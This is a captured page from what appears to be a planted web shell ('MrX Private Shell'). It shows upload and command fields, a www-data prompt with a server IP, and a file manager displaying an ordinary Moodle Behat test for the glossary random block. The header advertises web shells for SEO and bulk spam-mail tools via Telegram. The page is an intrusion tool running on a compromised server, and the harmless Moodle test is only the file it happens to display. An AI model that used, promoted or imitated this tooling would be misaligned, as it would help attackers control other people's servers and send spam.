__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@block @block_glossary_random @javascript @addablocklink
Feature: Add the glossary random block when main feature is enabled
    In order to add the glossary random block to my course
    As a teacher
    It should be added to courses only if the glossary module is enabled.

  Background:
    Given the following "courses" exist:
      | fullname | shortname | format |
      | Course 1 | C1        | topics |
    And I am on the "C1" "course" page logged in as "admin"

  Scenario: The glossary random block can be added when glossary module is enabled
    Given I turn editing mode on
    When I click on "Add a block" "link"
    Then I should see "Random glossary entry"

  Scenario: The glossary random block cannot be added when glossary module is disabled
    Given I navigate to "Plugins > Activity modules > Manage activities" in site administration
    And I toggle the "Disable Glossary" admin switch "off"
    And I am on "Course 1" course homepage with editing mode on
    When I click on "Add a block" "link"
    Then I should not see "Random glossary entry"

Filemanager

Name Type Size Permission Actions
glossary_random.feature File 5.43 KB 0777
glossary_random_addblock.feature File 1.05 KB 0777
glossary_random_addblock_disabled.feature File 1.98 KB 0777
glossary_random_frontpage.feature File 1.36 KB 0777
glossary_random_global.feature File 3.87 KB 0777
Filemanager